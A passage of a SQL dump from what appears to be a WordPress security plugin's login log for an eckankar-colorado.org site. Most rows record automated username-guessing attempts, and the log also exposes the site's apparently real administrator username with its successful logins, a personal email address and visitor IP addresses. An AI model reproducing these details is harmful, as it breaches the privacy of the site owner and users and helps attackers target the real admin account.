Safari/604.1'),(18596,111245,1691935985.815946,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF0D72F3B3,'Mozilla/5.0 (Linux; Android 11; SM-S127DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18595,111244,1691935980.591938,1,'loginFailInvalidUsername','admin@eckankar-colorado.org',0,0x00000000000000000000FFFFBC7DA202,'Mozilla/5.0 (Linux; Android 12; SM-G996U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18594,111243,1691935268.853835,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF9FE0038D,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N981U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18593,111242,1691935267.031857,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF32EBF6E8,'Mozilla/5.0 (Linux; Android 7.1.1; SM-T350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Safari/537.36'),(18592,111241,1691935259.084802,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFBB10328E,'Mozilla/5.0 (Linux; Android 9; SM-J737R4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18591,111240,1691935255.810706,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFD4707B05,'Mozilla/5.0 (Linux; Android 10; LM-G710 Build/QKQ1.191222.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/87.0.4280.101 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/342.1.0.14.119;]'),(18590,111239,1691935252.592098,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFDFA670CC,'Mozilla/5.0 (Linux; Android 12; SM-N981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18589,111238,1691935238.264223,1,'loginFailInvalidUsername','editor',0,0x00000000000000000000FFFFC4292CA2,'Mozilla/5.0 (Linux; Android 11; motorola one 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18588,111183,1691907175.827470,1,'loginFailInvalidUsername','ireneaml',0,0x00000000000000000000FFFF14C53A91,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18587,111182,1691907169.678232,1,'loginFailInvalidUsername','missy',0,0x00000000000000000000FFFF14C53A91,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18586,110923,1691892561.451195,1,'loginFailInvalidUsername','f-admin',0,0x00000000000000000000FFFF66DE77D2,'Mozilla/5.0 (Linux; Android 9; SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18585,110922,1691892559.125980,1,'loginFailInvalidUsername','boss',0,0x00000000000000000000FFFF337830E4,'Mozilla/5.0 (Linux; Android 12) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/96.0.4664.104 Mobile DuckDuckGo/5 Safari/537.36'),(18584,110921,1691892557.491469,1,'loginFailInvalidUsername','rene',0,0x00000000000000000000FFFF8E2CF4FC,'Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18583,110920,1691892555.925969,1,'loginFailInvalidUsername','coco',0,0x00000000000000000000FFFFD4707495,'Mozilla/5.0 (Linux; Android 12; SM-G981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18582,110919,1691892553.363463,1,'loginFailInvalidUsername','pws',0,0x00000000000000000000FFFF7CA0EC2E,'Mozilla/5.0 (Linux; Android 10; SM-N986U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36'),(18581,110918,1691892550.286802,1,'loginFailInvalidUsername','wp',0,0x00000000000000000000FFFF2DA9586A,'Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(18521,110747,1691679814.790890,1,'loginFailInvalidUsername','admin-lpd',0,0x00000000000000000000FFFF7C69B81C,'Mozilla/5.0 (iPad; CPU OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/194.0.419363360 Mobile/15E148 Safari/604.1'),(18520,110746,1691679810.996595,1,'loginFailInvalidUsername','wrathion',0,0x00000000000000000000FFFF334FFA74,'Mozilla/5.0 (Linux; Android 11; SM-A515F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18519,110745,1691679808.748714,1,'loginFailInvalidUsername','shaohao',0,0x00000000000000000000FFFFB5709622,'Mozilla/5.0 (Linux; Android 11; A509DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18518,110744,1691679806.082769,1,'loginFailInvalidUsername','lpd-admin',0,0x00000000000000000000FFFF74D49C82,'Mozilla/5.0 (iPad; CPU OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/194.0.419363360 Mobile/15E148 Safari/604.1'),(18517,110743,1691679801.800875,1,'loginFailInvalidUsername','ncpsite',0,0x00000000000000000000FFFFCA898645,'Mozilla/5.0 (Linux; Android 10; LM-Q730) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Mobile Safari/537.36'),(18516,110742,1691679794.384557,1,'loginFailInvalidUsername','editor',0,0x00000000000000000000FFFF8394419A,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0'),(18515,110741,1691679612.299005,1,'loginFailInvalidUsername','admin777',0,0x00000000000000000000FFFFCA3FF277,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36'),(18514,110740,1691679610.050386,1,'loginFailInvalidUsername','chen',0,0x00000000000000000000FFFFAAF72984,'Mozilla/5.0 (Linux; Android 10; LM-G820) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36'),(18513,110739,1691679607.775722,1,'loginFailInvalidUsername','rexxar',0,0x00000000000000000000FFFF67906622,'Mozilla/5.0 (Linux; Android 11) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/93.0.4577.62 Mobile DuckDuckGo/5 Safari/537.36'),(18493,110041,1691580643.818790,1,'loginFailInvalidUsername','admin777',0,0x00000000000000000000FFFF294C1640,'Mozilla/5.0 (Linux; Android 11; SM-N975U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18492,110040,1691580638.946516,1,'loginFailInvalidUsername','chen',0,0x00000000000000000000FFFF5C733D2C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36'),(18491,110039,1691580637.373626,1,'loginFailInvalidUsername','rexxar',0,0x00000000000000000000FFFF6BAEE607,'Mozilla/5.0 (iPad; CPU OS 12_5_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1'),(18490,110038,1691580635.701662,1,'loginFailInvalidUsername','blackhand',0,0x00000000000000000000FFFF681CC3BA,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.101 Mobile/15E148 Safari/604.1'),(18489,110037,1691580630.948790,1,'loginFailInvalidUsername','durotan',0,0x00000000000000000000FFFF240795CD,'Mozilla/5.0 (Linux; Android 8.1.0) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/97.0.4692.98 Mobile DuckDuckGo/5 Safari/537.36'),(18488,110036,1691580605.209253,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFBC405FCA,'Mozilla/5.0 (Linux; Android 11; SM-A207M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18487,110035,1691580509.813258,1,'loginFailInvalidUsername','shaohao',0,0x00000000000000000000FFFF596CB91D,'Mozilla/5.0 (Linux; Android 11; LM-V600) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18486,110034,1691580507.357349,1,'loginFailInvalidUsername','lpd-admin',0,0x00000000000000000000FFFFCBBD9F23,'Mozilla/5.0 (Linux; Android 9; SM-J737A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18485,110033,1691580505.185988,1,'loginFailInvalidUsername','ncpsite',0,0x00000000000000000000FFFF0CEC91CB,'Mozilla/5.0 (Linux; Android 11; SM-G998W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18484,110032,1691580500.230659,1,'loginFailInvalidUsername','admin@eckankar-colorado.org',0,0x00000000000000000000FFFF557270AE,'Mozilla/5.0 (Linux; Android 10; JNY-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Mobile Safari/537.36'),(18483,109988,1691530531.119560,1,'loginFailInvalidUsername','admin-lpd',0,0x00000000000000000000FFFF41148134,'Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18482,109987,1691530528.738296,1,'loginFailInvalidUsername','wrathion',0,0x00000000000000000000FFFF747631CE,'Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18481,109986,1691530526.375850,1,'loginFailInvalidUsername','shaohao',0,0x00000000000000000000FFFFB612B146,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/184.2.407130758 Mobile/15E148 Safari/604.1'),(18469,109932,1691497148.809514,1,'loginFailInvalidUsername','admin777',0,0x00000000000000000000FFFFB984FAD6,'Mozilla/5.0 (Linux; Android 11; SM-N981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18468,109931,1691497146.477958,1,'loginFailInvalidUsername','chen',0,0x00000000000000000000FFFFBF6640D2,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G986U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18467,109930,1691497137.870846,1,'loginFailInvalidUsername','durotan',0,0x00000000000000000000FFFF50F84FDE,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/81.0.4044.124 Mobile/15E148 Safari/604.1'),(18466,109929,1691497114.381905,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF67EB2332,'Mozilla/5.0 (Linux; Android 12; SM-G996U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18465,109579,1691489108.375902,1,'loginFailInvalidUsername','admin-lpd',0,0x00000000000000000000FFFF9D782C04,'Mozilla/5.0 (Linux; Android 8.1.0; SAMSUNG SM-J727R4) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18464,109578,1691489106.133077,1,'loginFailInvalidUsername','wrathion',0,0x00000000000000000000FFFFC7681874,'Mozilla/5.0 (Linux; Android 10; moto g(7) supra) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.185 Mobile Safari/537.36'),(18463,109577,1691489103.438896,1,'loginFailInvalidUsername','shaohao',0,0x00000000000000000000FFFF92386E8B,'Mozilla/5.0 (Linux; Android 11; SM-S102DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36'),(18462,109576,1691489101.541142,1,'loginFailInvalidUsername','lpd-admin',0,0x00000000000000000000FFFF6EEBF325,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/190.1.416438978 Mobile/15E148 Safari/604.1'),(18461,109575,1691489098.787885,1,'loginFailInvalidUsername','ncpsite',0,0x00000000000000000000FFFFBB06414D,'Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18460,109574,1691489090.882774,1,'loginFailInvalidUsername','editor',0,0x00000000000000000000FFFFB5817902,'Mozilla/5.0 (Linux; Android 11; SM-F916U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.50 Mobile Safari/537.36'),(18459,109526,1691474957.287660,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18458,109525,1691473274.343079,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18457,109510,1691425505.581351,1,'loginFailInvalidUsername','chen',0,0x00000000000000000000FFFF1854D626,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.116 Mobile/15E148 Safari/604.1'),(18456,109509,1691425499.348553,1,'loginFailInvalidUsername','blackhand',0,0x00000000000000000000FFFF0EF1E0F8,'Mozilla/5.0 (Linux; Android 9; SM-S767VL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18455,109508,1691425496.589593,1,'loginFailInvalidUsername','durotan',0,0x00000000000000000000FFFF775D16BA,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 DuckDuckGo/7 Safari/605.1.15'),(18454,109507,1691425487.218845,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFAC696070,'Mozilla/5.0 (iPad; CPU OS 15_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.116 Mobile/15E148 Safari/604.1'),(18480,109985,1691530522.900297,1,'loginFailInvalidUsername','lpd-admin',0,0x00000000000000000000FFFF0EA14BDD,'Mozilla/5.0 (Linux; Android 11; SM-F711U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18479,109984,1691530520.129715,1,'loginFailInvalidUsername','ncpsite',0,0x00000000000000000000FFFF9FC05F6D,'Mozilla/5.0 (Linux; Android 11; moto g stylus (XT2115DL)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18478,109983,1691530514.035763,1,'loginFailInvalidUsername','admin@eckankar-colorado.org',0,0x00000000000000000000FFFF8D5EFE8A,'Mozilla/5.0 (Linux; Android 10; SM-G965U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18477,109981,1691530491.530108,1,'loginFailInvalidUsername','admin777',0,0x00000000000000000000FFFFB965ECA2,'Mozilla/5.0 (iPad; CPU OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),(18476,109980,1691530486.677845,1,'loginFailInvalidUsername','chen',0,0x00000000000000000000FFFF6FA4B3AC,'Mozilla/5.0 (Linux; Android 11; moto g power (XT2041DL)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18475,109979,1691530483.842569,1,'loginFailInvalidUsername','rexxar',0,0x00000000000000000000FFFFB9DC6535,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/92.0.4515.90 Mobile/15E148 Safari/604.1'),(18474,109978,1691530481.518887,1,'loginFailInvalidUsername','blackhand',0,0x00000000000000000000FFFFBC7DA202,'Mozilla/5.0 (Linux; Android 11; SM-S515DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18473,109977,1691530479.380899,1,'loginFailInvalidUsername','durotan',0,0x00000000000000000000FFFF6739964E,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36'),(18472,109976,1691530471.102915,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFB89A0D7A,'Mozilla/5.0 (Linux; Android 10; motorola one 5G ace) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18471,109964,1691519125.360374,1,'loginFailInvalidUsername','admins',0,0x00000000000000000000FFFF14E7E181,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18470,109963,1691519124.933406,1,'loginFailInvalidUsername','admins',0,0x00000000000000000000FFFF14E7E181,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18512,110738,1691679605.020501,1,'loginFailInvalidUsername','blackhand',0,0x00000000000000000000FFFFB987E0E2,'Mozilla/5.0 (Linux; Android 12; SM-G998U Build/SP1A.210812.016) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36 OPX/1.4'),(18511,110737,1691679603.293223,1,'loginFailInvalidUsername','durotan',0,0x00000000000000000000FFFF91EF5CB9,'Mozilla/5.0 (iPad; CPU OS 15_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.116 Mobile/15E148 Safari/604.1'),(18510,110736,1691679598.792140,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF677CCDEE,'Mozilla/5.0 (Linux; Android 10; CPH1921) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18509,110735,1691679364.526818,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18508,110734,1691677308.014135,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18507,110732,1691675695.286516,1,'loginFailInvalidUsername','smngrs953',0,0x00000000000000000000FFFF8B3B18D9,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18506,110731,1691675695.256509,1,'loginFailInvalidUsername','smngrs952',0,0x00000000000000000000FFFF8B3B18D9,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18505,110730,1691675668.698312,1,'loginFailInvalidUsername','pajero_sports',0,0x00000000000000000000FFFFADF90644,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18504,110729,1691675668.640407,1,'loginFailInvalidUsername','smngrs955',0,0x00000000000000000000FFFFADF90644,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18503,110728,1691675644.075968,1,'loginFailInvalidUsername','pajero_sports',0,0x00000000000000000000FFFF67AA7AD0,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(19294,119129,1694895682.351815,1,'loginFailInvalidUsername','isiah',0,0x00000000000000000000FFFFACAD43ED,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19325,120189,1695095751.330978,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19324,120187,1695094200.353799,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19323,119974,1695075305.174522,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF671A5723,'Mozilla/5.0 (Linux; Android 11; BE2025) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(19322,119969,1695072295.539631,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFAB71438C,'Mozilla/5.0 (Linux; Android 9; KFKAWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/94.4.4 like Chrome/94.0.4606.128 Safari/537.36'),(19316,119904,1695053060.586040,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19315,119902,1695052771.453092,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19314,119887,1695035285.318538,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF7347EFDC,'Mozilla/5.0 (Linux; Android 11; SM-N981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19313,119886,1695035273.316295,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFBE07E7FA,'Mozilla/5.0 (Linux; Android 12; SM-G981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19312,119790,1695010546.533338,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19311,119788,1695008029.589461,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19310,119782,1694994745.105154,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFAE1080B0,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19321,119947,1695066619.298470,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19320,119946,1695066471.314794,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19319,119945,1695066452.283842,1,'loginFailInvalidUsername','choll.03@comcast.net',0,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19318,119928,1695058632.784941,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19317,119908,1695055482.163717,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19332,120357,1695201531.813026,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF2DE48982,'Mozilla/5.0 (Linux; Android 11; SM-A716V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19330,120332,1695175069.539543,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B89793,'Mozilla/5.0'),(19331,120354,1695199486.374377,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFBAB36427,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/190.1.416438978 Mobile/15E148 Safari/604.1'),(19329,120272,1695149651.967961,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFC16E6A22,'Mozilla/5.0 (Linux; Android 11; SM-N976U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19328,120270,1695149207.703005,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF41149D7C,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G991B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(19326,120249,1695141143.460977,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B89793,'Mozilla/5.0'),(19327,120266,1695145647.617332,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B89793,'Mozilla/5.0'),(19338,120409,1695284043.960739,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF6BAFAC24,'Mozilla/5.0 (Linux; Android 11; motorola razr) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19337,120408,1695283512.264180,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF7B1EEEBB,'Mozilla/5.0 (Linux; Android 11; SM-A516U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19336,120407,1695273533.699122,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF6EF231EA,'Mozilla/5.0 (Linux; Android 11; SM-A125F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19335,120392,1695241964.894863,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF4C51066B,'Mozilla/5.0 (Linux; Android 10; SM-G965U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36'),(19334,120387,1695237433.150139,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D40B214,'Mozilla/5.0 (Linux; Android 12; SM-G981V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19346,120568,1695336122.295228,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19345,120567,1695335249.195398,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19344,120559,1695326130.989219,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19343,120558,1695325201.769857,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19342,120557,1695323768.137358,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19341,120555,1695321121.049506,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19362,120853,1695562365.891018,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E96E3,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),(19361,120852,1695562363.324429,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E96E3,'python-requests/2.6.0 CPython/2.7.5 